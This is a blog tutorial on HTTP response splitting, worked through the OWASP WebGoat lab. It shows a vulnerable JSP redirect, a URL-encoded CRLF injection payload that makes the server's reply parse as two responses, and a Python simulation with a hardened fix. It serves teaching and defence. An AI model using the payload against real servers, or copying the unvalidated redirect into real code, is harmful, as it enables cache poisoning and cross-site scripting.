HTTP Response Splitting

As the name suggests, HTTP response splitting is an attack in which user-supplied data (typically containing URL-encoded control characters) is copied by the application into an HTTP response header. If that data contains a line break, the attacker can terminate the application's own response early and append headers and a body of their choosing, so that a single response written by the server is read by the client as two separate responses.

This attack technique is also known as CRLF (Carriage Return/Line Feed) injection, because it relies on the CR (%0d) and LF (%0a) characters that terminate HTTP header lines.

Explanation using the OWASP WebGoat project: –

Let's say we have a search section in our app: –

[image: search form]

Consider the following JSP page, which redirects the request to the server with some of the POSTed parameters copied straight into the query string of the Location header: –

<%
    // Vulnerable as written: the parameter values go into the Location
    // header without validation or encoding.
    response.sendRedirect(request.getContextPath() + "/attack?" +
        "Screen=" + request.getParameter("Screen") +
        "&menu=" + request.getParameter("menu") +
        "&fromRedirect=yes&language=" + request.getParameter("language"));
%>

Let's say we post a harmless test value, say "test": –

[image: posting "test" in the search form]

Observation : –

The redirect sends the data on to /attack in a GET request, with the parameter values in the query string.

In this case the server answers with a single 302 response whose headers are: –

Content-Length: 0
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 16 Aug 2013 10:06:13 GMT
Location: http://localhost:8080/WebGoat/attack?Screen=79&menu=100&fromRedirect=yes&language=test
Server: Apache-Coyote/1.1

Sending malicious data : –

Malicious data is sent by inserting CR and LF characters into the parameter value, so that whatever follows them is parsed as new header lines, and then appending a complete second response (status line, headers, blank line and body) in URL-encoded form.

Let's say we want to send the following (every line ends in CR LF; the blank lines matter, because an empty line is what ends a header block): –

en
Content-Length:0

HTTP/1.1 200 OK
Content-Type:text/html
Content-Length:34

<html>Security Tester Entry</html>

The injected Content-Length:0 tells the client that the application's own 302 response has no body and therefore ends at the first blank line; everything after that blank line is read as a second, attacker-controlled response. The second Content-Length must equal the byte length of the injected body (34 bytes for the body above); if it is larger, the client waits for bytes that never arrive.

Encoding : –

The payload has to be URL encoded before it is placed in the parameter.

Tool used : – CAL9000

[image: CAL9000 encoder output]

Sample URL encoded data (line breaks as %0a only) : –

en%0aContent-Length:0%0a%0aHTTP/1.1%20200%20OK%0aContent-Type:text/html%0aContent-Length:34%0a%0a%3chtml%3eSecurity%20Tester%20Entry%3c/html%3e

Replace each "%0a" with "%0d%0a": HTTP header lines are terminated by the CR LF pair, not by a bare LF, so it is this pair that makes the server and the client start a new header line (and, after an empty line, a new response).

Updated encoded data : –

en%0d%0aContent-Length:0%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:text/html%0d%0aContent-Length:34%0d%0a%0d%0a%3chtml%3eSecurity%20Tester%20Entry%3c/html%3e

Hit search and notice that WebGoat detects the injected second response and reports the attack as successful.

[image: WebGoat reporting the attack]

Note:

HTTP response splitting can lead to web cache poisoning (a proxy or browser cache stores the attacker's second response under a URL of the attacker's choosing) and to cross-site scripting, since the attacker controls the entire body of the injected response.

Solutions : –

Any value taken from a GET/POST parameter (or from any other request data) that is written into a response header, such as the Location header built above, must be checked for CR and LF characters on the server side and rejected if it contains them. URL-encoding the parameter values when the redirect URL is rebuilt (so that a CR LF pair becomes %0D%0A) keeps the header on a single line and is a useful second layer. Many modern servlet containers refuse to write a header that contains CR/LF, but the application should not rely on that alone.
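The following is an added example, not code from the original post or from WebGoat. It simulates the redirect built by the JSP above, feeds it the CRLF payload from the encoding section, and parses the single server write the way a client or caching proxy would, so that the two responses become visible; it then applies the fix just described (reject CR/LF, percent-encode the values). The host, context path and all function names are assumptions of this example.

```python
"""Added example (not part of the original post or of WebGoat): simulates the
redirect built by the JSP above, feeds it the page's CRLF payload, and shows
the single server write being read as two HTTP responses; then the fix from
the Solutions section. All function names here are our own."""
from urllib.parse import quote, unquote

HOST = "http://localhost:8080"      # as in the Location header captured on the page
CONTEXT_PATH = "/WebGoat"            # assumed servlet context path

# The page's payload in its final %0d%0a form, including the blank line that
# ends the injected header block and a Content-Length equal to the body size.
PAYLOAD = ("en%0d%0aContent-Length:0%0d%0a%0d%0a"
           "HTTP/1.1%20200%20OK%0d%0aContent-Type:text/html%0d%0a"
           "Content-Length:34%0d%0a%0d%0a"
           "%3chtml%3eSecurity%20Tester%20Entry%3c/html%3e")
# What request.getParameter("language") hands to the JSP: the container
# URL-decodes the value, so the JSP receives raw CR and LF characters.
DECODED_PAYLOAD = unquote(PAYLOAD)
INJECTED_BODY = "<html>Security Tester Entry</html>"


def contains_crlf(value):
    """True if a value would end a header line when written into a header."""
    return "\r" in value or "\n" in value


def vulnerable_redirect(screen, menu, language):
    """Mirror of the JSP: decoded parameters are concatenated into the
    Location header with no validation or encoding, then written as a 302."""
    location = (f"{HOST}{CONTEXT_PATH}/attack?Screen={screen}&menu={menu}"
                f"&fromRedirect=yes&language={language}")
    return (f"HTTP/1.1 302 Found\r\nLocation: {location}\r\n"
            "Content-Length: 0\r\n\r\n").encode("latin-1")


def hardened_redirect(screen, menu, language):
    """Fix from the Solutions section: refuse CR/LF in every value that
    reaches a header, and percent-encode the values when rebuilding the
    query string (quote() turns a stray CR LF pair into %0D%0A, which
    cannot end a header line)."""
    params = {"Screen": screen, "menu": menu, "fromRedirect": "yes",
              "language": language}
    for name, value in params.items():
        if contains_crlf(value):
            raise ValueError(f"CR/LF in parameter {name!r}")
    query = "&".join(f"{k}={quote(v, safe='')}" for k, v in params.items())
    location = f"{HOST}{CONTEXT_PATH}/attack?{query}"
    return (f"HTTP/1.1 302 Found\r\nLocation: {location}\r\n"
            "Content-Length: 0\r\n\r\n").encode("latin-1")


def split_responses(raw):
    """Read a byte stream the way a client (or a caching proxy) does: status
    line, headers up to the blank line, then Content-Length bytes of body.
    Returns a list of (status_line, headers, body) for each response found."""
    responses, pos = [], 0
    while pos < len(raw):
        head_end = raw.find(b"\r\n\r\n", pos)
        if head_end < 0:
            break
        lines = raw[pos:head_end].decode("latin-1").split("\r\n")
        if not lines[0].startswith("HTTP/"):
            break                      # trailing bytes that are not a status line
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        length = int(headers.get("content-length", "0"))
        body_start = head_end + 4
        body = raw[body_start:body_start + length].decode("latin-1")
        responses.append((lines[0], headers, body))
        pos = body_start + length
    return responses


def demo():
    """Vulnerable: one write, two responses; hardened: the payload is refused."""
    split = split_responses(vulnerable_redirect("79", "100", DECODED_PAYLOAD))
    print(f"vulnerable redirect parsed as {len(split)} responses")
    for status, headers, body in split:
        print(f"  {status!r}  body={body!r}")
    try:
        hardened_redirect("79", "100", DECODED_PAYLOAD)
    except ValueError as err:
        print(f"hardened redirect rejected the payload: {err}")
    return split


if __name__ == "__main__":
    demo()
```

Running the script prints two responses for the vulnerable redirect: the application's own 302, ending at the injected blank line, followed by the attacker's 200 with the "Security Tester Entry" body, which is exactly what a shared cache would store for the redirect URL. The hardened version refuses the value before it reaches a header; even if that check were skipped, `quote()` would leave the Location header on one line.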

Written By: Krushna Prasad Subudhi, QA Engineer, Mindfire Solutions
